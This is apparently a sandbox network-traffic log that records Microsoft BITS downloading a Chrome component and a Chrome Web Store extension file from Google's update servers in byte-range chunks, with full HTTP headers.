                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 19066
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                        etag: "a49fca"
                                                                                                                                                                                        last-modified: Wed, 30 Jun 2021 16:53:29 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Fri, 02 Jul 2021 02:24:48 GMT
                                                                                                                                                                                        age: 17567
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 30 Jun 2021 16:53:29 GMT
                                                                                                                                                                                        Range: bytes=0-6986
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 6987
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                        etag: "a49fca"
                                                                                                                                                                                        last-modified: Wed, 30 Jun 2021 16:53:29 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Fri, 02 Jul 2021 02:24:48 GMT
                                                                                                                                                                                        age: 17567
                                                                                                                                                                                        content-range: bytes 0-6986/19066
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 30 Jun 2021 16:53:29 GMT
                                                                                                                                                                                        Range: bytes=6987-19065
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 12079
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                        etag: "a49fca"
                                                                                                                                                                                        last-modified: Wed, 30 Jun 2021 16:53:29 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Fri, 02 Jul 2021 02:24:48 GMT
                                                                                                                                                                                        age: 17568
                                                                                                                                                                                        content-range: bytes 6987-19065/19066
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 6760942
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77015
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=0-11199
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 11200
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77015
                                                                                                                                                                                        content-range: bytes 0-11199/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=11200-75127
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 63928
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77016
                                                                                                                                                                                        content-range: bytes 11200-75127/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=75128-165688
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 90561
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77016
                                                                                                                                                                                        content-range: bytes 75128-165688/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=165689-309547
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 143859
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77017
                                                                                                                                                                                        content-range: bytes 165689-309547/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=309548-545760
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 236213
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77018
                                                                                                                                                                                        content-range: bytes 309548-545760/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=545761-1015876
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 470116
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77019
                                                                                                                                                                                        content-range: bytes 545761-1015876/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=1015877-1619319
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 603443
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77020
                                                                                                                                                                                        content-range: bytes 1015877-1619319/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=1619320-2272836
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 653517
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77021
                                                                                                                                                                                        content-range: bytes 1619320-2272836/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=2272837-2821659
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 548823
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77022
                                                                                                                                                                                        content-range: bytes 2272837-2821659/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=2821660-3539889
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 718230
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 09:54:08 GMT
                                                                                                                                                                                        age: 77023
                                                                                                                                                                                        content-range: bytes 2821660-3539889/6760942
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        Range: bytes=3539890-4161646
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 621757
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/x-chrome-extension
                                                                                                                                                                                        etag: "2e2fe7"
                                                                                                                                                                                        last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
